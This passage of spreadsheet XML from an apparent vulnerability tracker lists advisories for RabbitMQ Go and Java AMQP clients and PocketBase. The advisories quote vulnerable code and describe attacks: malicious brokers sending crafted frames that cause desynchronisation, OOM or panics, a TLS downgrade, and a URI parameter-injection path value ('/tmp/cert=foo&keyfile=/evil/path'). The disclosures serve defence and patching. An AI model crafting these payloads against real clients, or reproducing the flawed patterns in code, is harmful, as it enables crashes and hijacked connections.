Found while preparing the 1.1.1 security release: the reproducer published in GHSA-9395-2g46-rj3f was run against the built 1.1.1 artifact before that advisory was published, and proved the class was still live. Publishing the original text would have reported this class as patched when it was not.</t>
        </is>
      </c>
      <c r="T242" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-xjw9-38cr-6372</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B243" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77411</t>
        </is>
      </c>
      <c r="D243" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="E243" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F243" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G243" s="5" t="inlineStr"/>
      <c r="H243" s="5" t="inlineStr"/>
      <c r="I243" s="5" t="inlineStr"/>
      <c r="J243" s="5" t="inlineStr"/>
      <c r="K243" s="5" t="inlineStr"/>
      <c r="L243" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M243" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N243" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O243" s="5" t="inlineStr"/>
      <c r="P243" s="5" t="inlineStr"/>
      <c r="Q243" s="5" t="inlineStr"/>
      <c r="R243" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="S243" s="5" t="inlineStr">
        <is>
          <t>**Summary**
A critical stream desynchronization vulnerability has been identified in the AMQP wire-protocol parser. When parsing a long string (`readLongstr`) within a table field, providing a length that exceeds the maximum signed 32-bit integer (`2^31 - 1`, or roughly `2.1` GiB) triggers an improper error-handling condition. The parser abruptly aborts the read and returns a success status (`"",nil`) without consuming the specified bytes from the underlying network buffer. This causes all subsequent read operations to become misaligned. The parser interprets arbitrary offsets within the remaining payload bytes as valid AMQP frame headers, leading to potential Remote Code Execution (RCE), data injection, or complete connection hijacking.
**Vulnerability Details**
The vulnerability exists within the bounds-checking logic of the readLongstr function:
```go
// read.go:113-114 — silent no-op return, bytes left in stream
if length &gt; (^uint32(0) &gt;&gt; 1) {
    return  // returns "", nil, does NOT consume `length` bytes
}
```
When `length` evaluates to a value greater than `0x7FFFFFFF`:
1. The function executes a silent `return` statement.
2. Because Go utilizes named or zero-value initialization for unassigned return registers, this yields `"", nil` (indicating a successful read of an empty string).
3. The Critical Failure: The reader's cursor is not advanced by `length` bytes. The malformed payload remains sitting in the TCP/buffer stream.
**Impact**
As `readTable` continues iterating over the stream under the assumption that the string was successfully parsed, the byte alignment is entirely broken.
- Parser Desynchronization: Future AMQP frame headers are read from arbitrary offsets inside the attacker-controlled message payload.
- Payload Reinterpretation: A malicious actor can carefully craft the trailing bytes of the initial payload to perfectly mimic valid AMQP frames (e.g., `connection.close`, `channel.open`, or message publishing frames), forcing the client/server to execute unintended actions.</t>
        </is>
      </c>
      <c r="T243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77411</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B244" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77405</t>
        </is>
      </c>
      <c r="D244" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E244" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F244" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G244" s="5" t="inlineStr"/>
      <c r="H244" s="5" t="inlineStr"/>
      <c r="I244" s="5" t="inlineStr"/>
      <c r="J244" s="5" t="inlineStr"/>
      <c r="K244" s="5" t="inlineStr"/>
      <c r="L244" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M244" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N244" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O244" s="5" t="inlineStr"/>
      <c r="P244" s="5" t="inlineStr"/>
      <c r="Q244" s="5" t="inlineStr"/>
      <c r="R244" s="5" t="inlineStr">
        <is>
          <t>CWE-316, CWE-326</t>
        </is>
      </c>
      <c r="S244" s="5" t="inlineStr">
        <is>
          <t>## Summary
A structural security weakness exists in the AMQP client's TLS configuration generator (`tlsConfigFromURI`). When constructing a `*tls.Config` object from an `amqps://` connection URI, the library initializes the structure without explicitly defining the `MinVersion` field. 
While modern versions of the Go compiler toolchain (Go 1.18+) default the implicit minimum version to TLS 1.2, this security posture relies entirely on an implicit toolchain dependency. If the library is compiled using legacy Go toolchains (Go &lt; 1.18), or if a future toolchain introduces fallback behavior, the client could silently negotiate obsolete and insecure TLS 1.0 or TLS 1.1 protocols during connection handshakes with a compromised or malicious AMQP broker.
---
## Vulnerability Details
### Mechanism
The vulnerability lies in the lack of an explicit safety floor when assigning configurations inside the URI component:
```go
// Example within uri.go's tlsConfigFromURI
cfg := &amp;tls.Config{
    ServerName: host,
    // MinVersion is left completely unassigned (defaults to 0, or toolchain default)
}
```
In the Go standard library (`crypto/tls`), leaving `MinVersion: 0` instructs the runtime to choose the toolchain's default minimum. Prior to Go 1.18, this default allowed negotiation down to TLS 1.0. Relying on implicit compiler configurations violates secure coding practices by decoupling the library's security posture from its source code, leaving applications vulnerable based solely on how they are built.
### Impact
If a client application is built with a legacy compiler environment or a custom Go runtime, an attacker capable of executing a Man-in-the-Middle (MitM) attack can force the connection to downgrade to TLS 1.0 or 1.1. This exposes the AMQP protocol data stream to well-known cryptographic vulnerabilities (such as BEAST, POODLE, or SWEET32), allowing the attacker to decrypt or alter message payloads, connection parameters, and authentication credentials.
---
## Attack Vector
An attacker performing a network-level downgrade attack can intercept a client connection built under a legacy toolchain:
1. **Interception:** A client application compiled on a legacy pipeline attempts to establish an encrypted connection to an AMQP broker.
2. **Protocol Downgrade:** The attacker intercepts the TLS Client Hello handshake and forces a downgrade negotiation to TLS 1.0.
3. **Cryptographic Exploitation:** Because `MinVersion` was never explicitly locked to `tls.VersionTLS12` by the library, the client accepts the weak cipher suites, allowing the attacker to monitor or manipulate the underlying AMQP session data.</t>
        </is>
      </c>
      <c r="T244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77405</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B245" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77408</t>
        </is>
      </c>
      <c r="D245" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E245" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F245" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G245" s="5" t="inlineStr"/>
      <c r="H245" s="5" t="inlineStr"/>
      <c r="I245" s="5" t="inlineStr"/>
      <c r="J245" s="5" t="inlineStr"/>
      <c r="K245" s="5" t="inlineStr"/>
      <c r="L245" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M245" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N245" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O245" s="5" t="inlineStr"/>
      <c r="P245" s="5" t="inlineStr"/>
      <c r="Q245" s="5" t="inlineStr"/>
      <c r="R245" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S245" s="5" t="inlineStr">
        <is>
          <t>## Summary
A data integrity and protocol corruption vulnerability exists in the AMQP client's property serialization logic. When encoding AMQP short string (`shortstr`) fields—such as identifiers, routing strings, and content metadata—the length of the string is explicitly cast to a fixed-size 8-bit unsigned integer (`uint8`). 
If an application provides a property string exceeding 255 bytes, the length counter silently wraps around (e.g., a length of 300 wraps to 44). As a result, the parser writes only a truncated portion of the string into the outgoing connection buffer without returning an error. This leads to silent data corruption, broken RPC routing, and unpredictable broker-side state behavior.
---
## Vulnerability Details
### Mechanism
The vulnerability resides in the wire-level serialization logic for application publishing properties:
```go
// write.go:246
length := uint8(len(b))  // wraps silently when len(b) &gt; 255 (e.g., 300 -&gt; 44)
```
Because Go allows silent integer truncation during explicit type casting, lengths larger than $2^8 - 1$ lose their most significant bits. The underlying stream writer reads `length` to determine how many bytes to pull from the buffer. Because no error or boundary check accompanies this truncation, the application believes the full payload was transmitted successfully.
### Affected Properties
This truncation behavior affects every standard AMQP field serialized as a `shortstr`:
* `CorrelationId`
* `ReplyTo`
* `MessageId`
* `Expiration`
* `UserId`
* `AppId`
* `ContentType`
* `ContentEncoding`
* `Type`
### Impact
The critical consequence is **silent protocol desynchronization at the application layer**. The underlying TCP stream remains framed properly (because the shortened length matches the bytes written), but the business logic is corrupted. Distributed transactions, request-reply correlations, and tracing headers are truncated, causing downstream systems to drop messages or route them to incorrect consumers.
---
## Attack Vector
An attacker who can influence metadata fields processed by an upstream application (such as a user-supplied tracking ID or a long content-type header) can exploit this to break system components:
1. **Targeting RPC Routing:** A user passes a malicious or overly long `CorrelationId` of 300 bytes through an application endpoint.
2. **Silent Truncation:** The library wraps the length value to 44, transmitting only the first 44 bytes to the rabbitMQ broker.
3. **Broken Correlation:** When the service processes the request and responds, the replying consumer attempts to route the message using the full 300-byte identifier. Because the broker only recognizes the truncated 44-byte ID, the reply loop breaks silently, leading to hanging processes or data leaks across transaction boundaries.</t>
        </is>
      </c>
      <c r="T245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77408</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B246" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77403</t>
        </is>
      </c>
      <c r="D246" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E246" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F246" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G246" s="5" t="inlineStr"/>
      <c r="H246" s="5" t="inlineStr"/>
      <c r="I246" s="5" t="inlineStr"/>
      <c r="J246" s="5" t="inlineStr"/>
      <c r="K246" s="5" t="inlineStr"/>
      <c r="L246" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M246" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N246" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O246" s="5" t="inlineStr"/>
      <c r="P246" s="5" t="inlineStr"/>
      <c r="Q246" s="5" t="inlineStr"/>
      <c r="R246" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S246" s="5" t="inlineStr">
        <is>
          <t>## Summary
A Denial of Service (DoS) vulnerability exists in the AMQP client's connection negotiation logic. The AMQP specification explicitly mandates a strict minimum frame size of 4096 bytes to prevent pathological packet fragmentation. While the library defines a `frameMinSize = 4096` constant, the connection negotiation loop fails to enforce this boundary, blindly accepting whatever maximum frame size (`FrameMax`) the server advertises during the handshake.
If a client connects to a malicious or compromised AMQP broker that advertises an extremely low `FrameMax` (such as 1 byte), the negotiation succeeds. Consequently, every subsequent message transmission is forced to splinter into thousands or millions of single-byte frames, causing massive CPU overhead, thread contention, and a near-instantaneous application freeze.
---
## Vulnerability Details
### Mechanism
During the connection establishment phase, the client and server negotiate connection parameters—including maximum channel count, heartbeat intervals, and maximum frame sizes. The vulnerability is located where the client accepts the server's tuning parameters:
```go
// Connection negotiation logic maps server values directly without validation
if serverSettings.FrameMax &gt; 0 {
    // VULNERABILITY: Lacks a floor validation check against frameMinSize (4096)
    c.config.FrameMax = serverSettings.FrameMax 
}
```
Because there is no conditional check asserting that `serverSettings.FrameMax &gt;= frameMinSize`, a value below the protocol specification floor is successfully registered. When the application later passes data payloads to the frame writer, the chunking algorithm splits the payload using the negotiated `FrameMax` value as its chunk window divisor.
### Impact
When `FrameMax` is set to an absurdly low threshold (e.g., 1 to 10 bytes):
* A standard 10 KiB message payload requires tens of thousands of individual write operations and frame headers.
* The system's CPU becomes entirely bound by frame serialization, memory allocation for frame structures, and context switching within the network output loops.
* This results in an application-layer Denial of Service (DoS) affecting not just the specific AMQP connection, but potentially the entire host system due to CPU resource starvation.
---
## Attack Vector
An attacker who compromises an upstream AMQP broker, performs a Man-in-the-Middle (MitM) interception, or tricks an application into connecting to an unauthorized external rogue broker can trigger this vulnerability:
1. **Rogue Handshake:** The client application connects to an AMQP endpoint controlled by the attacker.
2. **Malicious Parameter Tuning:** During the `connection.tune` phase, the rogue server returns a `FrameMax` value of `1`.
3. **Resource Exhaustion Trigger:** The client completes the handshake successfully. As soon as the client attempts to publish a message or process traffic, the internal loop fragments the data into single-byte frames, spiking the host's CPU usage to 100% and disabling the application thread.</t>
        </is>
      </c>
      <c r="T246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77403</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B247" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77410</t>
        </is>
      </c>
      <c r="D247" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E247" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F247" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G247" s="5" t="inlineStr"/>
      <c r="H247" s="5" t="inlineStr"/>
      <c r="I247" s="5" t="inlineStr"/>
      <c r="J247" s="5" t="inlineStr"/>
      <c r="K247" s="5" t="inlineStr"/>
      <c r="L247" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M247" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N247" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O247" s="5" t="inlineStr"/>
      <c r="P247" s="5" t="inlineStr"/>
      <c r="Q247" s="5" t="inlineStr"/>
      <c r="R247" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="S247" s="5" t="inlineStr">
        <is>
          <t>**Summary**
A flaw in the `recvContent` function allows a malicious AMQP server to trigger an Out-of-Memory (OOM) error, forcing the host operating system or container runtime to immediately terminate the client process.
**Vulnerability Details**
When receiving message content payloads, the client processes the expected size from the content header framework. The `recvContent` function attempts to optimize performance by pre-allocating memory for the message body based on the `ch.header.Size` field, which is a 64-bit unsigned integer (`uint64`).
```go
// channel.go:495-496
if cap(ch.body) == 0 {
    ch.body = make([]byte, 0, ch.header.Size)  // unbounded
}
```
The underlying library fails to validate or cap this requested size against any upper boundary—such as the maximum frame size negotiated during connection establishment (`FrameMax`). If a server specifies an extreme body size (e.g., `2^62` bytes), the Go runtime attempts to allocate an exabyte-scale slice capacity. This immediately exhausts available system memory, causing the operating system's OOM killer to terminate the application.
**Attack Vector / Exploitation Scenario**
- Message Delivery Phase: A malicious or compromised AMQP broker sends a standard `basic.deliver` frame containing a content header with an intentionally inflated `body-size` variable.
- Authentication Requirement: No special privileges or authentication bypasses are required; the crash occurs seamlessly during normal message consumption.
**Impact**
- Availability: High. Exploded memory consumption results in an instant process termination, destroying application state and availability for all threads sharing the environment.</t>
        </is>
      </c>
      <c r="T247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77410</t>
        </is>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B248" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77412</t>
        </is>
      </c>
      <c r="D248" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E248" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F248" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G248" s="5" t="inlineStr"/>
      <c r="H248" s="5" t="inlineStr"/>
      <c r="I248" s="5" t="inlineStr"/>
      <c r="J248" s="5" t="inlineStr"/>
      <c r="K248" s="5" t="inlineStr"/>
      <c r="L248" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M248" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N248" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O248" s="5" t="inlineStr"/>
      <c r="P248" s="5" t="inlineStr"/>
      <c r="Q248" s="5" t="inlineStr"/>
      <c r="R248" s="5" t="inlineStr">
        <is>
          <t>CWE-681</t>
        </is>
      </c>
      <c r="S248" s="5" t="inlineStr">
        <is>
          <t>**Summary**
A vulnerability in the readField function allows a malicious or compromised AMQP server to trigger an unhandled runtime panic in the client application, leading to an immediate crash of the entire process.
**Details**
When parsing incoming AMQP frames, the `readField` function processes byte-array fields (type tag `'x'`) by reading a 32-bit big-endian integer to determine the length of the data payload.
```go
// read.go:253-263
case 'x':
    var len int32
    if err = binary.Read(r, binary.BigEndian, &amp;len); err != nil {
        return nil, err
    }
    value := make([]byte, len)  // PANICS if len &lt; 0
```
If a server transmits a length value of `0xFFFFFFFF`, it is interpreted by the client as a signed 32-bit integer with a value of `-1`. Passing a negative integer to Go's built-in make() function for slice allocation triggers an unrecoverable runtime panic (panic: len out of range).
Because the reader goroutine handles network I/O without an explicit recover() wrapper, this panic propagates up to the runtime root, abruptly terminating the host application.
**Attack Vector / Exploitation Scenario**
An attacker capable of spoofing, compromising, or controlling an AMQP broker can exploit this flaw during two primary phases:
1. Connection Establishment: Sending a malicious connection.start handshake frame containing server-properties with an 'x' type field assigned a negative length.
2. Message Delivery: Delivering a message payload where the header table contains a malformed field matching the criteria above.
**Impact**
Availability: High. A single malformed frame can reliably crash the client process, resulting in a persistent Denial of Service (DoS) if the client automatically reconnects and receives the same payload.</t>
        </is>
      </c>
      <c r="T248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77412</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B249" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75516</t>
        </is>
      </c>
      <c r="D249" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E249" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F249" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G249" s="5" t="inlineStr"/>
      <c r="H249" s="5" t="inlineStr"/>
      <c r="I249" s="5" t="inlineStr"/>
      <c r="J249" s="5" t="inlineStr"/>
      <c r="K249" s="5" t="inlineStr"/>
      <c r="L249" s="5" t="inlineStr">
        <is>
          <t>maven:com.rabbitmq:amqp-client</t>
        </is>
      </c>
      <c r="M249" s="5" t="inlineStr">
        <is>
          <t>5.34.0</t>
        </is>
      </c>
      <c r="N249" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O249" s="5" t="inlineStr"/>
      <c r="P249" s="5" t="inlineStr"/>
      <c r="Q249" s="5" t="inlineStr"/>
      <c r="R249" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S249" s="5" t="inlineStr">
        <is>
          <t>## Vulnerability
In `AMQConnection.java` (line 435-436), after `Connection.Tune` negotiation, the frame-max limit is set via:
```java
_frameHandler.setFrameMax(
    Math.min(this.maxInboundMessageBodySize, frameMax));
```
When `frameMax = 0` (meaning "unlimited" per AMQP spec), `Math.min(67108864, 0) = 0`. This value is then passed to `Utils.framePayloadLimit(0)` which returns `Integer.MAX_VALUE` (line 77-79 of Utils.java):
```java
static int framePayloadLimit(int frameMax) {
    if (frameMax &lt;= 0) {
      return Integer.MAX_VALUE;
    }
    // ...
}
```
This completely defeats the `maxInboundMessageBodySize` protection (default 64MB) at the frame level.
## Attack Scenario
A malicious AMQP server (or MITM) sends `Connection.Tune` with `frameMax=0`:
1. Client defaults: `requestedFrameMax = 0` (`ConnectionFactory.DEFAULT_FRAME_MAX`, line 82)
2. `negotiatedMaxValue(0, 0)` = `Math.max(0, 0)` = 0 (line 673-676)
3. `Math.min(maxInboundMessageBodySize, 0)` = 0 — **64MB cap defeated**
4. `framePayloadLimit(0)` = `Integer.MAX_VALUE` — no frame size enforcement
5. Attacker sends a single frame with `frameSize = 0x1FFFFFFF` (~500MB)
6. `Frame.readFrom()` (line 135) executes `new byte[frameSize]` — **OOM crash**
The frame does not need to be a body frame — method frames, header frames, or heartbeat frames with a crafted size field all trigger the allocation before any content-level check fires.
## Root Cause
The AMQP spec uses `frameMax=0` to mean "unlimited", but `Math.min` treats it as the integer value zero. The intent of line 435-436 was to take the smaller of the two limits, but when one limit uses 0-means-unlimited semantics, `Math.min` always selects the zero, disabling the other limit.
## Impact
- **Default configuration is vulnerable**: Both `requestedFrameMax` (client) and legitimate servers' `frameMax` in Tune may be 0
- **Single-frame OOM**: One malicious frame triggers up to ~2GB allocation (`Integer.MAX_VALUE` bytes)
- **Bypasses existing protection**: `maxInboundMessageBodySize` (introduced to cap allocations at 64MB) is entirely defeated at the frame level
- **Different from ValueReader OOM**: This is a frame-layer allocation in `Frame.readFrom()`, not a value-layer allocation in `ValueReader.readBytes()`
## Affected Code
- `AMQConnection.java:435-436` — `Math.min` with 0-means-unlimited
- `Utils.java:77-79` — `framePayloadLimit(0)` returns `Integer.MAX_VALUE`
- `Frame.java:135` — `new byte[frameSize]` allocation site
- `ConnectionFactory.java:82` — `DEFAULT_FRAME_MAX = 0`
## Suggested Fix
```java
int effectiveFrameMax = (frameMax == 0)
    ? this.maxInboundMessageBodySize
    : Math.min(this.maxInboundMessageBodySize, frameMax);
_frameHandler.setFrameMax(effectiveFrameMax);
```
This treats `frameMax=0` as "use maxInboundMessageBodySize as the cap" instead of "zero".</t>
        </is>
      </c>
      <c r="T249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75516</t>
        </is>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B250" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77404</t>
        </is>
      </c>
      <c r="D250" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E250" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F250" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G250" s="5" t="inlineStr"/>
      <c r="H250" s="5" t="inlineStr"/>
      <c r="I250" s="5" t="inlineStr"/>
      <c r="J250" s="5" t="inlineStr"/>
      <c r="K250" s="5" t="inlineStr"/>
      <c r="L250" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M250" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N250" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O250" s="5" t="inlineStr"/>
      <c r="P250" s="5" t="inlineStr"/>
      <c r="Q250" s="5" t="inlineStr"/>
      <c r="R250" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="S250" s="5" t="inlineStr">
        <is>
          <t>## Summary
A query parameter injection vulnerability exists in the AMQP client's connection URI formatting logic. When generating or parsing connection URIs, TLS-related filesystem paths (such as certificates or keys) are appended directly to the URI's query string using string concatenation rather than secure URL encoding via functions like `url.QueryEscape`.
If an application handles a TLS file path containing special character delimiters (such as `&amp;` or `=`), these characters are interpreted as parameter separators by the URI parser. If the resulting `URI.String()` output is subsequently re-parsed via `ParseURI`, the injected fields can silently overwrite or hijack critical configuration parameters, forcing the client to use arbitrary connection settings or alternate TLS files.
---
## Vulnerability Details
### Mechanism
The vulnerability lies within the lack of proper escaping when compiling connection string components into a raw URL format:
```go
// Example of insecure string concatenation during URI building
uri := fmt.Sprintf("amqps://user:pass@host/%s?certfile=%s&amp;keyfile=%s", vhost, certPath, keyPath)
```
Because `certPath` and `keyPath` are not passed through `url.QueryEscape`, special URL characters preserve their control meanings. For instance, if a user supply a certificate path named:
`/tmp/cert=foo&amp;keyfile=/evil/path`
The generated string translates into:
`...?certfile=/tmp/cert=foo&amp;keyfile=/evil/path&amp;keyfile=/original/path`
When this string passes back through `ParseURI` (common in connection re-dial routines or configuration replication steps), standard URL parsing mechanics treat the string as multiple distinct parameters. Depending on map assignment order inside the parser, the injected keys take precedence over the original parameters.
### Impact
By manipulating the file paths used for TLS assets, an attacker or compromised local sub-system can:
* Inject arbitrary alternative options or override protocol settings.
* Substitute or switch keyfiles, leading to connection failures or the parsing of unauthorized cryptographic assets.
* Corrupt connection state variables, triggering application-layer failures during connection setup or recovery.
---
## Attack Vector
An attacker who has partial control over directory naming conventions or environmental variables used to specify local infrastructure paths can execute a parameter injection attack:
1. **Path Creation:** An attacker sets up a path containing deliberate URL parameter delimiters (e.g., `/var/lib/certs/client.crt?cacertfile=/tmp/fake_ca.crt&amp;`).
2. **String Generation:** The application serializes the active connection state or passes the paths down to an unescaped URI builder function.
3. **Configuration Hijack:** The URI string is generated with the injected parameter embedded into the query structure. When the client attempts to reuse or re-parse this connection string during a connection retry or worker spin-up, it parses the injected `cacertfile` parameter, loading a different, unverified Certificate Authority string.</t>
        </is>
      </c>
      <c r="T250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77404</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B251" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82410</t>
        </is>
      </c>
      <c r="D251" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E251" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F251" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G251" s="5" t="inlineStr"/>
      <c r="H251" s="5" t="inlineStr"/>
      <c r="I251" s="5" t="inlineStr"/>
      <c r="J251" s="5" t="inlineStr"/>
      <c r="K251" s="5" t="inlineStr"/>
      <c r="L251" s="5" t="inlineStr">
        <is>
          <t>go:github.com/pocketbase/pocketbase</t>
        </is>
      </c>
      <c r="M251" s="5" t="inlineStr">
        <is>
          <t>0.22.48, 0.39.7</t>
        </is>
      </c>
      <c r="N251" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O251" s="5" t="inlineStr"/>
      <c r="P251" s="5" t="inlineStr"/>
      <c r="Q251" s="5" t="inlineStr"/>
      <c r="R251" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S251" s="5" t="inlineStr">
        <is>
          <t>PocketBase already has builtin panic-recover middleware for the regular requests handling but it doesn't cover panics in internal child/worker goroutines which in some situations could cause termination of the server process.
To prevent this from hapenning all existing internal worker functions were wrapped with the new helper `routine.SafeWrap(f)` _(auto recovers and returns any eventual panic as regular error)_.
The vulnerability was reported by @gigioneggiando and it is strongly recommended to upgrade to PocketBase **[v0.39.7](https://github.com/pocketbase/pocketbase/releases/tag/v0.39.7)** _(the fix was also backported in [v0.22.48](https://github.com/pocketbase/pocketbase/releases/tag/v0.22.48) in case you are using older PocketBase &lt; v0.23.0)_.</t>
        </is>
      </c>
      <c r="T251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82410</t>
        </is>
      </c>
    </row>
    <row r="252">
